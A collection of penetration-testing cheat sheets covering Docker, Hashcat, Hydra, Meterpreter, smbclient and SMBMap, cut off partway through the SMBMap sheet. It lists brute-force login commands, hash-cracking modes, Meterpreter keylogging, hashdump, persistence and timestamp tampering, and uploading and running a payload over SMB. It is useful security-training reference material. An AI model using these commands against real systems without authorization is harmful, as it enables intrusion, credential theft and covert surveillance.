├── Docker Cheat Sheet.md ├── Hashcat Cheat Sheet.md ├── Hydra Cheat Sheet.md ├── Meterpreter cheat sheet.md ├── README.md ├── SMBClient Cheat Sheet.md ├── SMBMap Cheat Sheet.md ├── Tshark_CheatSheet.md ├── ffuf Cheat Sheet.md └── nmap Cheat Sheet.md /Docker Cheat Sheet.md: -------------------------------------------------------------------------------- 1 | # Docker Cheat Sheet 2 | *Containerization Made Simple* 3 | 4 | --- 5 | 6 | ## **1. Core Concepts** 7 | - **Image**: Immutable template with app code, dependencies, and config. 8 | - **Container**: Isolated runtime instance of an image. 9 | - **Dockerfile**: Blueprint to automate image builds. 10 | - **Registry**: Hub for storing/sharing images (e.g., Docker Hub, ECR). 11 | - **Volume**: Persistent storage for containers. 12 | - **Network**: Communication channel between containers/host. 13 | 14 | --- 15 | 16 | ## **2. Installation** 17 | 18 | ### **Linux** 19 | ```bash 20 | curl -fsSL https://get.docker.com | sh 21 | sudo usermod -aG docker $(whoami) && newgrp docker 22 | ``` 23 | 24 | ### **macOS/Windows** 25 | - Install [Docker Desktop](https://www.docker.com/products/docker-desktop). 26 | 27 | ### **Verify** 28 | ```bash 29 | docker version # Check client/server versions 30 | docker run hello-world # Run a test container 31 | ``` 32 | 33 | --- 34 | 35 | ## **3. Image Management** 36 | 37 | | **Command** | **Description** | 38 | |--------------------------------------|---------------------------------------------------| 39 | | `docker images` | List local images | 40 | | `docker pull :` | Download image from registry | 41 | | `docker rmi ` | Remove image | 42 | | `docker build -t : .` | Build image from Dockerfile | 43 | | `docker image prune -a` | Delete unused images | 44 | 45 | **Example**: 46 | ```bash 47 | docker pull nginx:alpine # Lightweight Nginx image 48 | docker build -t myapp:1.0 . # Build from current directory's Dockerfile 49 | ``` 50 | 51 | **Note**: 52 | - Use `:` (e.g., `:latest`, `:alpine`) to specify image versions. 53 | - `docker image prune -a` removes **all** unused images, not just dangling ones. 54 | 55 | --- 56 | 57 | ## **4. Container Lifecycle** 58 | 59 | | **Command** | **Description** | 60 | |--------------------------------------|---------------------------------------------------| 61 | | `docker run -d --name `| Run container in background | 62 | | `docker start/stop/restart ` | Manage container state | 63 | | `docker rm -f ` | Force remove running container | 64 | | `docker exec -it sh` | Open interactive shell | 65 | | `docker logs -f ` | Tail container logs | 66 | | `docker ps -a` | List all containers (including stopped) | 67 | 68 | **Common Flags**: 69 | - `-p 8080:80`: Map host port 8080 → container port 80. 70 | - `-v /host/path:/container/path`: Bind mount volume. 71 | - `-e VAR=value`: Set environment variable. 72 | - `--network mynet`: Attach to custom network. 73 | 74 | **Example**: 75 | ```bash 76 | docker run -d --name webserver -p 8080:80 -v ./html:/usr/share/nginx/html nginx:alpine 77 | ``` 78 | 79 | **Explanation**: 80 | - `-d`: Run in detached mode (background). 81 | - `-v ./html:/usr/share/nginx/html`: Mount the local `html` folder into the container’s Nginx directory. 82 | 83 | --- 84 | 85 | ## **5. Dockerfile Essentials** 86 | 87 | ### **Sample Dockerfile** 88 | ```dockerfile 89 | FROM python:3.9-slim # Base image 90 | WORKDIR /app # Set working directory 91 | COPY requirements.txt . # Copy dependencies file 92 | RUN pip install --no-cache-dir -r requirements.txt # Install deps 93 | COPY . . # Copy app code 94 | EXPOSE 5000 # Declare port 95 | CMD ["gunicorn", "--bind", "0.0.0.0:5000", "app:app"] # Runtime command 96 | ``` 97 | 98 | ### **Multi-Stage Build** 99 | ```dockerfile 100 | # Build stage (heavy, includes build tools) 101 | FROM node:18 as builder 102 | WORKDIR /app 103 | COPY package*.json ./ 104 | RUN npm install 105 | COPY . . 106 | RUN npm run build # Compile app 107 | 108 | # Production stage (lightweight, only necessary files) 109 | FROM nginx:alpine 110 | COPY --from=builder /app/dist /usr/share/nginx/html # Copy built files 111 | ``` 112 | 113 | **Build & Run**: 114 | ```bash 115 | docker build -t myapp:1.0 . 116 | docker run -d -p 80:80 myapp:1.0 117 | ``` 118 | 119 | **Note**: 120 | - Multi-stage builds reduce image size by discarding build tools in the final image. 121 | - `--from=builder` copies files from the earlier build stage. 122 | 123 | --- 124 | 125 | ## **6. Networking** 126 | 127 | | **Command** | **Description** | 128 | |--------------------------------------|---------------------------------------------------| 129 | | `docker network ls` | List networks | 130 | | `docker network create mynet` | Create custom network | 131 | | `docker network inspect mynet` | Show network details | 132 | 133 | **Example**: 134 | ```bash 135 | docker network create app_network 136 | docker run -d --network app_network --name frontend nginx 137 | docker run -d --network app_network --name backend api:latest 138 | ``` 139 | 140 | **Explanation**: 141 | - Containers on the same network can communicate using their service names (e.g., `frontend` can ping `backend`). 142 | 143 | --- 144 | 145 | ## **7. Volumes & Storage** 146 | 147 | | **Command** | **Description** | 148 | |--------------------------------------|---------------------------------------------------| 149 | | `docker volume create myvol` | Create named volume | 150 | | `docker volume ls` | List volumes | 151 | | `docker run -v myvol:/data ...` | Mount volume | 152 | 153 | **Example**: 154 | ```bash 155 | docker run -d --name db -v pgdata:/var/lib/postgresql/data postgres:15 156 | ``` 157 | 158 | **Note**: 159 | - Volumes persist data even if the container is deleted. 160 | - Use `-v pgdata:/var/lib/postgresql/data` to store PostgreSQL data permanently. 161 | 162 | --- 163 | 164 | ## **8. Docker Compose** 165 | 166 | ### **Sample `docker-compose.yml`** 167 | ```yaml 168 | version: '3.8' 169 | services: 170 | web: 171 | image: nginx:alpine 172 | ports: 173 | - "80:80" 174 | volumes: 175 | - ./html:/usr/share/nginx/html # Bind mount for static files 176 | db: 177 | image: postgres:15 178 | environment: 179 | POSTGRES_PASSWORD: secret # Set DB password 180 | volumes: 181 | - pgdata:/var/lib/postgresql/data # Persistent volume 182 | 183 | volumes: 184 | pgdata: # Define named volume 185 | ``` 186 | 187 | | **Command** | **Description** | 188 | |--------------------------------------|---------------------------------------------------| 189 | | `docker compose up -d` | Start services in background | 190 | | `docker compose down` | Stop and remove containers/volumes | 191 | | `docker compose logs -f` | Follow service logs | 192 | 193 | **Explanation**: 194 | - `docker compose up -d` reads the `docker-compose.yml` file and starts all defined services. 195 | - Named volumes (e.g., `pgdata`) are managed automatically. 196 | 197 | --- 198 | 199 | ## **9. Advanced Techniques** 200 | 201 | ### **Resource Limits** 202 | ```bash 203 | docker run -d --name app --memory=512m --cpus=1.5 myapp:1.0 204 | ``` 205 | **Note**: 206 | - Restrict memory (`--memory`) and CPU (`--cpus`) to prevent a container from hogging resources. 207 | 208 | ### **Health Checks** 209 | ```dockerfile 210 | HEALTHCHECK --interval=30s --timeout=3s \ 211 | CMD curl -f http://localhost:5000/health || exit 1 212 | ``` 213 | **Note**: 214 | - Docker periodically runs this check to verify the app is healthy. 215 | - Use `docker inspect ` to see health status. 216 | 217 | ### **Security Best Practices** 218 | 1. Avoid `root` user in containers: 219 | ```dockerfile 220 | FROM node:18 221 | USER node # Run as non-root "node" user 222 | ``` 223 | 2. Scan for vulnerabilities: 224 | ```bash 225 | docker scan myapp:1.0 # Uses Snyk to find CVEs 226 | ``` 227 | 228 | --- 229 | 230 | ## **10. Maintenance & Optimization** 231 | 232 | | **Command** | **Description** | 233 | |--------------------------------------|---------------------------------------------------| 234 | | `docker system prune -a --volumes` | Remove unused images/containers/volumes | 235 | | `docker stats` | Live resource usage monitor | 236 | | `docker history ` | Inspect image layers | 237 | 238 | **Tips**: 239 | - Use `.dockerignore` to exclude unnecessary files (e.g., `node_modules`, `.git`). 240 | - Tag images semantically: `myapp:1.0-prod`. 241 | 242 | --- 243 | 244 | ## **11. Troubleshooting** 245 | 246 | | **Issue** | **Solution** | 247 | |--------------------------|---------------------------------------------------| 248 | | Port conflicts | Check running containers: `docker ps` | 249 | | Permission denied | Use `-v $(pwd):/data:ro` for read-only mounts | 250 | | Container won’t start | Inspect logs: `docker logs ` | 251 | | Image too large | Use multi-stage builds and Alpine-based images | 252 | 253 | --- 254 | 255 | ## **12. References** 256 | - [Docker Documentation](https://docs.docker.com/) 257 | - [Dockerfile Best Practices](https://docs.docker.com/develop/develop-images/dockerfile_best-practices/) 258 | 259 | --- 260 | -------------------------------------------------------------------------------- /Hashcat Cheat Sheet.md: -------------------------------------------------------------------------------- 1 | # Hashcat Cheat Sheet 2 | 3 | ## **1. Basic Terminology** 4 | 5 | - **Hash**: A fixed-size string generated by a hash function (e.g., MD5, SHA-256). 6 | - **Hashcat**: A powerful password recovery tool that supports multiple hash types and attack modes. 7 | - **Attack Modes**: Strategies used to crack hashes (e.g., brute-force, dictionary, hybrid). 8 | - **Wordlist**: A file containing potential passwords or phrases for dictionary attacks. 9 | - **Mask**: A pattern used in brute-force attacks to define the structure of passwords. 10 | 11 | --- 12 | ## **2. Basic Usage** 13 | 14 | ### General Syntax 15 | ```bash 16 | hashcat [options] 17 | ``` 18 | 19 | ### Common Options 20 | | **Option** | **Description** | 21 | |------------------|---------------------------------------------------------------------------------| 22 | | `-m ` | Specify the hash type (e.g., `0` for MD5, `1000` for NTLM). | 23 | | `-a ` | Specify the attack mode (e.g., `0` for dictionary, `3` for brute-force). | 24 | | `-o ` | Save cracked hashes to a file. | 25 | | `--show` | Show cracked hashes. | 26 | | `--force` | Ignore warnings and force execution. | 27 | | `-w ` | Set workload profile (`1` for low, `2` for medium, `3` for high). | 28 | | `-r ` | Apply custom rules for wordlist mutation. | 29 | 30 | --- 31 | 32 | ## **3. Hash Types** 33 | 34 | Common hash types and their corresponding `-m` values: 35 | - **MD5**: `0` 36 | - **SHA1**: `100` 37 | - **SHA256**: `1400` 38 | - **NTLM**: `1000` 39 | - **bcrypt**: `3200` 40 | - **Wordpress**: `400` 41 | - **JWT**: `16500` 42 | 43 | For a full list, run: 44 | ```bash 45 | hashcat --help 46 | ``` 47 | 48 | --- 49 | 50 | ## **4. Attack Modes** 51 | 52 | ### Dictionary Attack 53 | ```bash 54 | hashcat -m 0 -a 0 hashes.txt wordlist.txt 55 | ``` 56 | - **Description**: Uses a wordlist to crack hashes. 57 | - **Example**: Crack MD5 hashes using `rockyou.txt`. 58 | 59 | ### Combinator Attack 60 | ```bash 61 | hashcat -m 0 -a 1 hashes.txt wordlist1.txt wordlist2.txt 62 | ``` 63 | - **Description**: Combines words from two wordlists. 64 | 65 | ### Mask Attack 66 | ```bash 67 | hashcat -m 0 -a 3 hashes.txt ?l?l?l?l?l 68 | ``` 69 | - **Description**: Uses a mask to define password structure. 70 | - **Common Masks**: 71 | - `?l`: Lowercase letters (`a-z`) 72 | - `?u`: Uppercase letters (`A-Z`) 73 | - `?d`: Digits (`0-9`) 74 | - `?s`: Special characters (`!@#$%^&*`) 75 | - `?a`: All characters (`?l?u?d?s`) 76 | 77 | ### Hybrid Attack 78 | ```bash 79 | hashcat -m 0 -a 6 hashes.txt wordlist.txt ?d?d?d 80 | ``` 81 | - **Description**: Combines a wordlist with a mask (prefix or suffix). 82 | 83 | ### Rule-Based Attack 84 | ```bash 85 | hashcat -m 0 -a 0 hashes.txt wordlist.txt -r rules/best64.rule 86 | ``` 87 | - **Description**: Applies rules to mutate words in the wordlist. 88 | 89 | --- 90 | 91 | ## **5. Practical Examples** 92 | 93 | ### Crack MD5 Hashes 94 | ```bash 95 | hashcat -m 0 -a 0 hashes.txt rockyou.txt 96 | ``` 97 | 98 | ### Crack NTLM Hashes 99 | ```bash 100 | hashcat -m 1000 -a 0 hashes.txt wordlist.txt 101 | ``` 102 | 103 | ### Brute-Force 6-Digit PIN 104 | ```bash 105 | hashcat -m 0 -a 3 hashes.txt ?d?d?d?d?d?d 106 | ``` 107 | 108 | ### Crack bcrypt Hashes 109 | ```bash 110 | hashcat -m 3200 -a 0 hashes.txt wordlist.txt -w 3 111 | ``` 112 | 113 | ### Crack Wordpress Hashes 114 | ```bash 115 | hashcat -m 400 -a 0 hashes.txt wordlist.txt 116 | ``` 117 | 118 | --- 119 | 120 | ## **6. Advanced Techniques** 121 | 122 | ### Using Rules 123 | ```bash 124 | hashcat -m 0 -a 0 hashes.txt wordlist.txt -r rules/best64.rule 125 | ``` 126 | - **Common Rules**: 127 | - `best64.rule`: A collection of 64 common mutation rules. 128 | - `dive.rule`: A more extensive rule set. 129 | 130 | ### Using Potfiles 131 | - Hashcat stores cracked hashes in a potfile (`~/.hashcat/hashcat.potfile`). 132 | - To view cracked hashes: 133 | ```bash 134 | hashcat --show hashes.txt 135 | ``` 136 | 137 | ### Distributed Cracking 138 | - Use `--restore` to resume sessions across multiple machines. 139 | 140 | ### Optimizing Performance 141 | - Use `-w` to adjust workload: 142 | ```bash 143 | hashcat -m 0 -a 0 hashes.txt wordlist.txt -w 3 144 | ``` 145 | - Use `--force` to bypass warnings (not recommended for production). 146 | 147 | --- 148 | 149 | ## **7. Useful Tips** 150 | 151 | - **Use GPU**: Hashcat is optimized for GPU cracking. Ensure your GPU drivers are installed. 152 | - **Wordlists**: Use SecLists or rockyou.txt for common passwords. 153 | - **Rules**: Experiment with rules to increase cracking efficiency. 154 | - **Potfile**: Regularly check the potfile for cracked hashes. 155 | 156 | --- 157 | 158 | ## **8. References** 159 | 160 | - Official Hashcat Website: [https://hashcat.net/hashcat/](https://hashcat.net/hashcat/) 161 | - Hashcat Hash Type: [https://hashcat.net/wiki/doku.php?id=example_hashes](https://hashcat.net/wiki/doku.php?id=example_hashes) 162 | - Hashcat Wiki: [https://hashcat.net/wiki/](https://hashcat.net/wiki/) 163 | - SecLists GitHub: [https://github.com/danielmiessler/SecLists](https://github.com/danielmiessler/SecLists) 164 | 165 | --- 166 | -------------------------------------------------------------------------------- /Hydra Cheat Sheet.md: -------------------------------------------------------------------------------- 1 | # Hydra Cheat Sheet 2 | *Fast Network Login Cracker for Brute-Forcing Protocols* 3 | 4 | --- 5 | 6 | ## **1. Core Concepts** 7 | - **Hydra**: Parallelized login cracker supporting 50+ protocols (SSH, HTTP, SMB, etc.). 8 | - **Service Module**: Protocol-specific rules for authentication (e.g., `ssh`, `http-post-form`). 9 | - **Wordlists**: Files like `rockyou.txt` or `SecLists` for usernames/passwords. 10 | - **Brute-Force**: Testing credential combinations systematically. 11 | 12 | --- 13 | 14 | ## **2. Basic Syntax** 15 | ```bash 16 | hydra [options] [module-specific-parameters] 17 | ``` 18 | 19 | --- 20 | 21 | ## **3. Essential Flags** 22 | | **Flag** | **Description** | 23 | |--------------------|------------------------------------------------------| 24 | | `-l ` | Single username (e.g., `-l admin`) | 25 | | `-L ` | Username wordlist (e.g., `-L users.txt`) | 26 | | `-p ` | Single password (e.g., `-p Password123`) | 27 | | `-P ` | Password wordlist (e.g., `-P passwords.txt`) | 28 | | `-s ` | Custom port (e.g., `-s 8080` for non-standard HTTP) | 29 | | `-t ` | Parallel tasks (default: 16; max: 64) | 30 | | `-v` / `-V` | Verbose mode (`-V` for real-time output) | 31 | | `-f` | Stop after first valid login | 32 | | `-e nsr` | Test `n` (null), `s` (same as user), `r` (reverse) | 33 | | `-w ` | Wait time between attempts (e.g., `-w 5`) | 34 | | `-W ` | Per-host delay (e.g., `-W 2` to avoid lockouts) | 35 | | `-R` | Restore a previous session | 36 | | `-x ` | Brute-force mode (e.g., `-x 6:8:a1d` for 6-8 chars) | 37 | 38 | --- 39 | 40 | ## **4. Service Modules & Examples** 41 | *Format*: ``: `[module-specific parameters]` 42 | 43 | **Common service modules:** 44 | - **SSH**: `ssh` 45 | - **FTP**: `ftp` 46 | - **HTTP Forms**: `http[s]-{get|post}-form` 47 | - **SMB**: `smb` 48 | - **MySQL**: `mysql` 49 | - **RDP**: `rdp` 50 | - **SMTP**: `smtp` 51 | - **WordPress**: `http-form-post` (custom module) 52 | 53 | ### **SSH** 54 | **Module**: `ssh` 55 | ```bash 56 | hydra -L users.txt -P passwords.txt 10.10.10.10 ssh -s 22 -t 64 57 | ``` 58 | **Notes**: 59 | - Use `-t` to increase threads for faster cracking. 60 | 61 | --- 62 | 63 | ### **HTTP Form Login** 64 | **Module**: `http[s]-post-form` 65 | **Syntax**: 66 | ``` 67 | "/path:POST-data:F=Failure-string:S=Success-string" 68 | ``` 69 | **Example**: 70 | ```bash 71 | hydra 10.10.10.10 http-post-form \ 72 | "/login.php:user=^USER^&pass=^PASS^:F=Invalid credentials" -L users.txt -P passwords.txt 73 | ``` 74 | **Notes**: 75 | - Use `:S=` to match success criteria (e.g., `S=302` for redirects). 76 | - Add headers with `-H "Cookie: session=xyz"`. 77 | 78 | --- 79 | 80 | ### **SMB (Windows Shares)** 81 | **Module**: `smb` 82 | ```bash 83 | hydra -L users.txt -P passwords.txt 10.10.10.10 smb -W 3 84 | ``` 85 | **Notes**: 86 | - Target specific shares: `smb://WORKGROUP\\C$`. 87 | 88 | --- 89 | 90 | ### **FTP** 91 | **Module**: `ftp` 92 | ```bash 93 | hydra -L users.txt -P passwords.txt ftp://10.10.10.10 -s 21 -V 94 | ``` 95 | **Anonymous Access**: 96 | ```bash 97 | hydra -l anonymous -P "" ftp://10.10.10.10 98 | ``` 99 | 100 | --- 101 | 102 | ### **MySQL** 103 | **Module**: `mysql` 104 | ```bash 105 | hydra -L users.txt -P passwords.txt 10.10.10.10 mysql -t 32 106 | ``` 107 | 108 | --- 109 | 110 | ### **RDP (Remote Desktop)** 111 | **Module**: `rdp` 112 | ```bash 113 | hydra -L users.txt -P passwords.txt rdp://10.10.10.10 -V 114 | ``` 115 | 116 | --- 117 | 118 | ### **SMTP** 119 | **Module**: `smtp` 120 | **Brute-force**: 121 | ```bash 122 | hydra -L users.txt -P passwords.txt smtp://10.10.10.10 123 | ``` 124 | **Verify Emails (VRFY)**: 125 | ```bash 126 | hydra -L users.txt smtp-vrfy://10.10.10.10 127 | ``` 128 | 129 | --- 130 | 131 | ### **WordPress** 132 | **Module**: `http-form-post` (custom) 133 | ```bash 134 | hydra -l admin -P rockyou.txt 10.10.10.10 http-form-post \ 135 | "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username" 136 | ``` 137 | 138 | --- 139 | 140 | ## **5. Advanced Techniques** 141 | 142 | ### **Custom Headers & Proxies** 143 | ```bash 144 | hydra -l admin -P passwords.txt 10.10.10.10 http-post-form \ 145 | "/login:user=^USER^&pass=^PASS^:F=error" -H "X-Forwarded-For: 127.0.0.1" -x http://proxy:8080 146 | ``` 147 | 148 | ### **Password Mutations** 149 | Test variations like `admin123` or `Admin123`: 150 | ```bash 151 | hydra -l admin -P passwords.txt -e nsr 10.10.10.10 ssh 152 | ``` 153 | 154 | ### **Resume Sessions** 155 | ```bash 156 | hydra -R 157 | ``` 158 | 159 | --- 160 | 161 | ## **6. Optimization & Safety** 162 | 163 | ### **Avoid Lockouts** 164 | - Use `-w` and `-W` for delays: 165 | ```bash 166 | hydra -l admin -P passwords.txt -w 5 -W 2 10.10.10.10 ssh 167 | ``` 168 | 169 | ### **Performance** 170 | - Increase threads: `-t 64`. 171 | - Use smaller, targeted wordlists first. 172 | 173 | ### **Wordlists** 174 | ```bash 175 | git clone https://github.com/danielmiessler/SecLists # Comprehensive wordlists 176 | ``` 177 | 178 | --- 179 | 180 | ## **7. Troubleshooting** 181 | 182 | | **Issue** | **Solution** | 183 | |--------------------------|---------------------------------------------------| 184 | | "Too many connections" | Reduce threads (`-t 16`), add delays (`-w`/`-W`). | 185 | | "Invalid module" | Check protocol syntax (e.g., `http-post-form`). | 186 | | No results | Verify failure strings match responses. | 187 | 188 | --- 189 | 190 | ## **9. References** 191 | - **Hydra GitHub**: https://github.com/vanhauser-thc/thc-hydra 192 | - **SecLists**: https://github.com/danielmiessler/SecLists 193 | -------------------------------------------------------------------------------- /Meterpreter cheat sheet.md: -------------------------------------------------------------------------------- 1 | # Metasploit Meterpreter 2 | 3 | ## Basic Commands 4 | 5 | - **help**: Show available meterpreter commands 6 | - **sysinfo**: Display system information (OS, hostname, architecture) 7 | - **ps**: List running processes (PID, name, user) 8 | - **kill** : Terminate a process by PID 9 | - **migrate** : Move meterpreter to another process (often a more stable one) 10 | - **rev2self**: Revert the current process to its original user context 11 | 12 | ## File System Commands 13 | 14 | - **ls**: List files in the current directory 15 | - **cd** : Change the current directory to `` 16 | - **pwd**: Show the current directory path 17 | - **cat** : Display the contents of `` 18 | - **download** : Download `` from the target 19 | - **upload** : Upload `` from local to the target 20 | 21 | ## Network Commands 22 | 23 | - **ipconfig**: Show network adapter configuration 24 | - **route**: View or modify the routing table 25 | - **netstat**: View active network connections 26 | - **portfwd**: Forward a local port to a remote service (`portfwd add -l -p -r `) 27 | - **getsockname**: Display the socket name for the active connection 28 | 29 | ## User Management Commands 30 | 31 | - **getuid**: Show the current user ID 32 | - **ps**: List running processes with user ownership 33 | - **getprivs**: List the current user’s privileges 34 | - **getsystem**: Attempt privilege escalation to SYSTEM 35 | 36 | ## Persistence Commands 37 | 38 | - **persistence**: Enable persistent meterpreter access on the target 39 | - **run** : Execute a script (e.g., `run persistence -U -i -p -r `) 40 | 41 | ## Shell Commands 42 | 43 | - **shell**: Open a command shell on the target 44 | - **execute -f** : Run a command on the target 45 | - **background**: Background the current meterpreter session 46 | - **Ctrl+Z**: Suspend/Background the current session in console mode 47 | 48 | ## Other Commands 49 | 50 | - **use** : Load a meterpreter extension 51 | - **run** : Execute a script or extension command 52 | - **keyscan_start**: Start capturing keystrokes on the target 53 | - **keyscan_dump**: Display captured keystrokes 54 | - **screenshot**: Take a screenshot of the target’s desktop 55 | - **webcam_list**: List available webcams on the target 56 | - **webcam_snap**: Capture a snapshot from a webcam 57 | - **hashdump**: Dump local password hashes on the target 58 | - **timestomp**: Alter file timestamps on the target to evade detection 59 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Cheat sheets 2 | 3 | I hope that will help at least one of you out there. 4 | 5 | -------------------------------------------------------------------------------- /SMBClient Cheat Sheet.md: -------------------------------------------------------------------------------- 1 | # smbclient Cheat Sheet 2 | 3 | ## **1. Basic Terminology** 4 | - **SMB (Server Message Block)**: Protocol for file sharing, printers, and network communication. 5 | - **smbclient**: Command-line tool to interact with SMB shares (similar to FTP). 6 | - **Share**: A network folder or resource exposed via SMB (e.g., `C$`, `Documents`). 7 | - **Workgroup/Domain**: Network group for shared resources (default: `WORKGROUP`). 8 | 9 | --- 10 | 11 | ## 2. Basic Usage** 12 | 13 | ### General Syntax 14 | ```bash 15 | smbclient [options] /// 16 | ``` 17 | Replace `server` with the name or IP address of the server hosting the file share, and `share` with the name of the file share. 18 | 19 | You will be prompted for your username and password for the file share. Once authenticated, you will be presented with a command prompt where you can enter various commands to interact with the file share. 20 | ### Common Options 21 | | **Option** | **Description** | 22 | |---------------------|---------------------------------------------------------------------------------| 23 | | `-U [%pass]` | Username and password (e.g., `-U admin%Password123`). | 24 | | `-W ` | Workgroup/domain name (default: `WORKGROUP`). | 25 | | `-I ` | Server IP address (bypasses DNS). | 26 | | `-p ` | Custom port (default: 445 for SMB over TCP/IP). | 27 | | `-N` | No password prompt (use with empty or guest access). | 28 | | `-E` | Hide password prompt output. | 29 | | `-c ` | Execute a command non-interactively (e.g., `-c 'ls'`). | 30 | | `-A ` | Load credentials from a file (format: `username = admin`, `password = pass`). | 31 | | `-m ` | Set max SMB protocol (e.g., `-m SMB3`). | 32 | | `-d ` | Debug verbosity (0-10). | 33 | 34 | --- 35 | 36 | ## **3. Interactive Commands** 37 | 38 | Once connected, use these commands: 39 | 40 | |**Command**|**Description**| 41 | |---|---| 42 | |`ls`|List files/directories.| 43 | |`cd `|Change directory.| 44 | |`get `|Download a file.| 45 | |`put `|Upload a file.| 46 | |`mget `|Download multiple files (e.g., `mget *.txt`).| 47 | |`mput `|Upload multiple files.| 48 | |`rm `|Delete a file.| 49 | |`mkdir `|Create a directory.| 50 | |`rmdir `|Delete a directory.| 51 | |`pwd`|Print current directory.| 52 | |`recurse`|Toggle recursive mode for `mget`/`mput`.| 53 | |`mask `|Set a file filter (e.g., `mask *.docx`).| 54 | |`tar`|Create/extract tar backups (e.g., `tar c backup.tar *`).| 55 | |`exit`|Quit smbclient.| 56 | 57 | --- 58 | 59 | ## **4. Practical Examples** 60 | 61 | ### **Connection** 62 | **Anonymous/Guest Access:** 63 | ```bash 64 | smbclient //192.168.1.10/public -N 65 | ``` 66 | 67 | **Authenticated Access:** 68 | ```bash 69 | smbclient //192.168.1.10/C$ -U admin%Password123 70 | ``` 71 | 72 | **Specify Domain/Workgroup:** 73 | ```bash 74 | smbclient //SERVER/Share -W CORP -U user%pass 75 | ``` 76 | 77 | --- 78 | 79 | ### **File Operations** 80 | **Download a File:** 81 | ```bash 82 | smbclient //192.168.1.10/Data -U user%pass -c "get report.docx" 83 | ``` 84 | 85 | **Upload All TXT Files:** 86 | ```bash 87 | smbclient //192.168.1.10/Data -U user%pass -c "mask *.txt; recurse; mput *.txt" 88 | ``` 89 | 90 | **Delete a File:** 91 | ```bash 92 | smbclient //192.168.1.10/Data -U user%pass -c "rm oldfile.zip" 93 | ``` 94 | 95 | --- 96 | 97 | ### **Directory Management** 98 | **Create a Directory:** 99 | ```bash 100 | smbclient //192.168.1.10/Data -U user%pass -c "mkdir Projects" 101 | ``` 102 | 103 | **Recursive Download:** 104 | ```bash 105 | smbclient //192.168.1.10/Data -U user%pass -c "recurse; prompt; mget *" 106 | ``` 107 | 108 | --- 109 | 110 | ### **Non-Interactive Mode** 111 | **List Shares via Script:** 112 | ```bash 113 | smbclient -L 192.168.1.10 -U admin%Password123 -N -I 192.168.1.10 114 | ``` 115 | 116 | **Backup Directory to Tar:** 117 | ```bash 118 | smbclient //192.168.1.10/Backup -U user%pass -c "tar c backup.tar Documents" 119 | ``` 120 | 121 | --- 122 | 123 | ## **5. Advanced Techniques** 124 | 125 | ### **Mounting Shares** 126 | Use `mount.cifs` (Linux) or `net use` (Windows) for persistent access: 127 | ```bash 128 | sudo mount -t cifs //192.168.1.10/Data /mnt/share -o user=admin,pass=Password123 129 | ``` 130 | 131 | ### **Brute-Force Share Names** 132 | Combine with tools like `nmap` or `enum4linux`: 133 | ```bash 134 | enum4linux -S 192.168.1.10 135 | ``` 136 | 137 | ### **Using a Credentials File** 138 | Create `creds.txt`: 139 | ```ini 140 | username = admin 141 | password = Password123 142 | domain = CORP 143 | ``` 144 | Then: 145 | ```bash 146 | smbclient //192.168.1.10/C$ -A creds.txt 147 | ``` 148 | 149 | --- 150 | 151 | ## **6. Troubleshooting** 152 | 153 | - **Connection Refused**: Check firewall rules, SMB port (445/139), and service status. 154 | - **Access Denied**: Verify credentials, share permissions, and user privileges. 155 | - **Protocol Errors**: Use `-m SMB2` or `-m SMB3` to enforce protocol version. 156 | 157 | --- 158 | 159 | ## **7. References** 160 | - [smbclient Man Page](https://www.samba.org/samba/docs/current/man-html/smbclient.1.html) 161 | -------------------------------------------------------------------------------- /SMBMap Cheat Sheet.md: -------------------------------------------------------------------------------- 1 | # SMBMap Cheat Sheet 2 | 3 | ## **1. Basic Terminology** 4 | - **SMBMap**: A tool to enumerate SMB shares, permissions, and perform file operations across Windows domains. 5 | - **SMB (Server Message Block)**: Protocol for shared access to files, printers, and ports. 6 | - **Share**: A network folder or resource exposed over SMB (e.g., `C$`, `ADMIN$`). 7 | - **Null Session**: Connecting to SMB without credentials (often restricted in modern systems). 8 | 9 | --- 10 | ## **2. Basic Usage** 11 | 12 | ### General Syntax 13 | ```bash 14 | smbmap [options] -H 15 | ``` 16 | 17 | ### Common Flags 18 | | **Flag** | **Description** | 19 | |----------------------|---------------------------------------------------------------------------------| 20 | | `-H ` | Target IP address | 21 | | `-u ` | Username (use `-u ''` for null session) | 22 | | `-p ` | Password | 23 | | `-d ` | Domain/workgroup (use `.` for local workgroup) | 24 | | `-s ` | Specific share to target | 25 | | `-P ` | Custom SMB port (default: 445) | 26 | | `-x ` | Execute a command on the target | 27 | | `-R` | Recursive directory listing (with read permissions) | 28 | | `--download ` | Download a file from the share | 29 | | `--upload ` | Upload a file to the share | 30 | | `--users` | Enumerate users | 31 | | `--admin` | Check if user has admin access | 32 | | `-v` | Verbose output | 33 | 34 | --- 35 | 36 | ## **3. Practical Examples** 37 | 38 | ### **Authentication** 39 | **Null Session (Guest Access):** 40 | ```bash 41 | smbmap -u '' -p '' -d . -H 192.168.1.1 42 | ``` 43 | 44 | **Authenticated Access:** 45 | ```bash 46 | smbmap -u admin -p 'Password123!' -d WORKGROUP -H 192.168.1.1 47 | ``` 48 | 49 | --- 50 | 51 | ### **Share Enumeration** 52 | **List All Shares:** 53 | ```bash 54 | smbmap -H 192.168.1.1 55 | ``` 56 | 57 | **Check Specific Share:** 58 | ```bash 59 | smbmap -H 192.168.1.1 -s 'C$' 60 | ``` 61 | 62 | **Check Shares with Full Permissions:** 63 | ```bash 64 | smbmap -H 192.168.1.1 -R 65 | ``` 66 | 67 | --- 68 | 69 | ### **File Operations** 70 | **Download a File:** 71 | ```bash 72 | smbmap -u admin -p 'Password123!' -H 192.168.1.1 --download 'C$\secret.txt' 73 | ``` 74 | 75 | **Upload a File:** 76 | ```bash 77 | smbmap -u admin -p 'Password123!' -H 192.168.1.1 --upload '/tmp/payload.exe' 'C$\Windows\Temp\payload.exe' 78 | ``` 79 | 80 | **Recursive Directory Listing:** 81 | ```bash 82 | smbmap -u guest -p '' -H 192.168.1.1 -R 'Documents' 83 | ``` 84 | 85 | --- 86 | 87 | ### **Command Execution** 88 | **Run a Command (e.g., `whoami`):** 89 | ```bash 90 | smbmap -u admin -p 'Password123!' -H 192.168.1.1 -x 'whoami' 91 | ``` 92 | 93 | **Execute a PowerShell Script:** 94 | ```bash 95 | smbmap -u admin -p 'Password123!' -H 192.168.1.1 -x 'powershell -c "Get-Process"' 96 | ``` 97 | 98 | --- 99 | 100 | ### **User & Permission Checks** 101 | **Enumerate Users:** 102 | ```bash 103 | smbmap -H 192.168.1.1 --users 104 | ``` 105 | 106 | **Check Admin Access:** 107 | ```bash 108 | smbmap -u admin -p 'Password123!' -H 192.168.1.1 